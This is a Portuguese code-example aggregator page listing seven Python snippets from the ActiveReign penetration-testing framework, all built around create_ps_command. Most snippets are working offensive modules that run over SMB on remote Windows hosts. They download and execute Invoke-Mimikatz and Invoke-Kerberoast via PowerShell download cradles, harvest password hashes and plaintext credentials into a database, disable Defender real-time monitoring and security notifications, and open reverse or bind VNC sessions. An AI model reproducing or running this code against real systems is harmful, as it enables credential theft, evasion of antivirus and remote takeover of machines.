Exemplos de create_ps_command em Python, exemplos de ar3.helpers.powershell.create_ps_command em Python

Exemplo n.º 1

0

Exibir arquivo

Arquivo: mimikatz.py Projeto: startagain2016/ActiveReign

    def run(self, target, args, smb_con, loggers, config_obj):
        logger  = loggers['console']
        timeout = args.timeout
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
        try:
            # Define Script Source
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
                setattr(args, 'timeout', timeout + 60)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
                setattr(args, 'timeout', timeout + 25)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            try:
                # Execute
                cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
                results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

                # Display Output
                if not results:
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
                    return
                elif args.debug:
                    for line in results.splitlines():
                        loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line])

                # Parse results and send creds to db
                db_updates = 0
                for cred in self.parse_mimikatz(results):
                    if cred[0] == "hash":
                        smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                        loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1],cred[2],cred[3])])
                        db_updates += 1

                    elif cred[0] == "plaintext":
                        smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                        loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
                        db_updates += 1
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])

                # write results to file
                file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
                tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
                tmp_logger.info(results)
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])

            except Exception as e:
                if str(e) == "list index out of range":
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
                else:
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

Exemplo n.º 2

0

Exibir arquivo

    def run(self, target, args, smb_con, loggers, config_obj):

        '''
        Full credit for kill-defender goes to @awsmhacks, amazing work!
        This was implemented in his project over at: https://github.com/awsmhacks/CrackMapExtreme

        Additional Resources:
        https://www.tenforums.com/tutorials/105486-enable-disable-notifications-windows-security-windows-10-a.html
        '''

        logger = loggers['console']
        logger.warning([smb_con.host, smb_con.ip, self.name.upper(), "This module is still in testing and not opsec safe..."])

        if self.args['ACTION']['Value'].lower() == 'disable':
            notify = "Enabled"
            action = "$true"
        elif self.args['ACTION']['Value'].lower() == 'enable':
            notify = "Disabled"
            action = "$false"
        else:
            loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "Invalid module arg, only {enable, disable} allowed"])
            return

        kill_notify = """"FOR /F %a IN ('REG.EXE QUERY hku 2^>NUL ^| FIND ^"HKEY_USERS^"') DO REG.EXE add ^"%a\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.SystemToast.SecurityAndMaintenance^" /v ^"{}^" /d ^"0^" /t REG_DWORD /F" """.format(notify)
        kill_defender = 'Set-MpPreference -DisableRealtimeMonitoring {};'.format(action)
        kd_verify     = 'Get-MpPreference |select DisableRealtimeMonitoring'

        try:
            # Modify notifications
            x = code_execution(smb_con, args, target, loggers, config_obj, kill_notify, return_data=True)

            # Modify Defender
            cmd = powershell.create_ps_command(kill_defender, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            x   = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Execution complete, Sleeping 5 seconds for process shutdown...'])
            sleep(8)

            # Verify
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Verifying Defender status...'])
            cmd = powershell.create_ps_command(kd_verify, loggers['console'], force_ps32=args.force_ps32,no_obfs=args.no_obfs, server_os=smb_con.os)
            x   = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
            for line in x.splitlines():
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

Exemplo n.º 3

0

Exibir arquivo

    def run(self, target, args, smb_con, loggers, config_obj):
        logger = loggers['console']
        timeout = args.timeout
        loggers['console'].info([
            smb_con.host, smb_con.ip,
            self.name.upper(), 'Attempting Invoke-Kerberoast'
        ])
        try:
            # Define Script Source
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(
                    srv_addr)
                setattr(args, 'timeout', timeout + 30)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
                setattr(args, 'timeout', timeout + 15)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            launcher = powershell.gen_ps_iex_cradle(script_location, '')

            # Execute
            cmd = powershell.create_ps_command(launcher,
                                               loggers['console'],
                                               force_ps32=args.force_ps32,
                                               no_obfs=args.no_obfs,
                                               server_os=smb_con.os)
            x = code_execution(smb_con,
                               args,
                               target,
                               loggers,
                               config_obj,
                               cmd,
                               return_data=True)

            # Display Output
            for line in x.splitlines():
                loggers['console'].success(
                    [smb_con.host, smb_con.ip,
                     self.name.upper(), line])

            # write results to file
            file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
            tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
            tmp_logger.info(x)
            loggers['console'].info([
                smb_con.host, smb_con.ip,
                self.name.upper(), "Output saved to: {}".format(file_name)
            ])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

Exemplo n.º 4

0

Exibir arquivo

Arquivo: invoke_vnc.py Projeto: theralfbrown/ActiveReign

    def run(self, target, args, smb_con, loggers, config_obj):
        cmd = ''
        logger = loggers['console']
        timeout = args.timeout
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-VNC'])
        try:
            # Define Script Source
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Vnc.ps1'.format(srv_addr)
                setattr(args, 'timeout', timeout + 30)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1'
                setattr(args, 'timeout', timeout + 15)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            if self.args['CONTYPE']['Value'] == 'reverse':
                if not self.args['IPADDRESS']['Value']:
                    self.args['IPADDRESS']['Value'] = get_local_ip()

                cmd = """Invoke-Vnc -ConType reverse -IpAddress {} -Port {} -Password {}""".format(self.args['IPADDRESS']['Value'],self.args['PORT']['Value'],self.args['PASSWORD']['Value'])

            elif self.args['CONTYPE']['Value'] == 'bind':
                cmd = """Invoke-Vnc -ConType bind -Port {} -Password {}""".format(self.args['PORT']['Value'],self.args['PASSWORD']['Value'])

            else:
                loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "Invalid CONTYPE"])
                exit(1)

            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            # Execute
            cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

            # Display Output
            if not x.startswith('Code execution failed'):
                for line in x.splitlines():
                    loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line])
            else:
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Command execute with no output"])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

Exemplo n.º 5

0

Exibir arquivo

    def run(self, target, args, smb_con, loggers, config_obj):
        logger = loggers['console']
        try:
            # Get script:
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
            logger.debug('Fetching script from {}'.format(script_location))

            # Setup
            timeout = args.timeout
            setattr(args, 'timeout', timeout+10)       # Modify timeout to allow execution time
            cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            try:
                # Execute
                cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, obfs=args.obfs, server_os=smb_con.os)
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
                x = code_execution(smb_con, args, target, loggers, config_obj, cmd=cmd, return_data=True)
                # Display Output
                for line in x.splitlines():
                    loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), line])

                # Parse results and send creds to db
                db_updates = 0
                for cred in self.parse_mimikatz(x):
                    if cred[0] == "hash":
                        smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                        db_updates += 1

                    elif cred[0] == "plaintext":
                        smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                        db_updates += 1
                loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
            except Exception as e:
                loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), str(e)])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

Exemplo n.º 6

0

Exibir arquivo

Arquivo: host_enum.py Projeto: theralfbrown/ActiveReign

def ps_execution(con, args, target, loggers, config_obj):
    try:
        cmd = powershell.create_ps_command(args.ps_execute,
                                           loggers['console'],
                                           force_ps32=args.force_ps32,
                                           no_obfs=args.no_obfs,
                                           server_os=con.os)
        result = code_execution(con,
                                args,
                                target,
                                loggers,
                                config_obj,
                                cmd,
                                return_data=True)
        for line in result.splitlines():
            loggers['console'].info(
                [con.host, con.ip,
                 args.exec_method.upper(), line])
    except Exception as e:
        loggers['console'].debug(
            [con.host, con.ip,
             args.exec_method.upper(),
             str(e)])

Exemplo n.º 7

0

Exibir arquivo

def ps_execution(con,args,target,loggers,config_obj):
    try:
        cmd = powershell.create_ps_command(args.ps_execute, loggers['console'], force_ps32=args.force_ps32, obfs=args.obfs, server_os=con.os)
        code_execution(con, args, target, loggers, config_obj, cmd=cmd)
    except Exception as e:
        loggers['console'].debug([con.host, con.ip, "PS1 Execute", str(e)])